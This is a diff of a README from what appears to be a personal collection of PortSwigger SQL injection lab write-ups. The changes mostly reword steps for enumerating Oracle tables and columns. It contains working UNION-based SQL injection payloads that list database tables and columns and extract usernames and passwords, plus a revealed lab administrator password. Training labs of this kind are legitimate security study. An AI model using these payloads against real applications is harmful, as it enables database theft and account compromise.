Luk4szf/PortSwigger/SQL injection/README.md

    ```sql
    SELECT * FROM someTable WHERE category='any' UNION SELECT table_name, NULL FROM all_tables--
    ```
-   In this case, the `USERS_XJIAWY` table was found.
+   In this case, a table named `USERS_XJIAWY` was identified.

 2. **Identify Column Names:**
-   Next, query the `ALL_TAB_COLUMNS` view to identify columns in the `USERS_XJIAWY` table:
+   Next, query the `ALL_TAB_COLUMNS` view to identify the columns in the `USERS_XJIAWY` table:
    ```sql
    SELECT * FROM someTable WHERE category='any' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name = 'USERS_XJIAWY'--
    ```
-   This reveals columns like `USERNAME_HDFLSL` and `PASSWORD_VASGBS`.
+   This reveals columns such as `USERNAME_HDFLSL` and `PASSWORD_VASGBS`.

 3. **Extract Data:**
    Finally, retrieve the usernames and passwords:
    ```sql
    SELECT * FROM someTable WHERE category='any' UNION SELECT USERNAME_HDFLSL, PASSWORD_VASGBS FROM USERS_XJIAWY--
    ```
-   The password for the `administrator` is discovered.
+   I discovered that the password for the administrator is `2ozd1e4np7yp6wc47rx3`.

 # SQL Injection Attack: Listing the Database Contents on Non-Oracle Databases

 ## Lab Description
 ![image](Picture/lab6.png)

-In this lab, the database is using PostgreSQL, which stores table information in the `information_schema.tables` view.
+In this lab, the target database is PostgreSQL, which stores table information in the `information_schema.tables` view.

 ### Exploiting the Vulnerability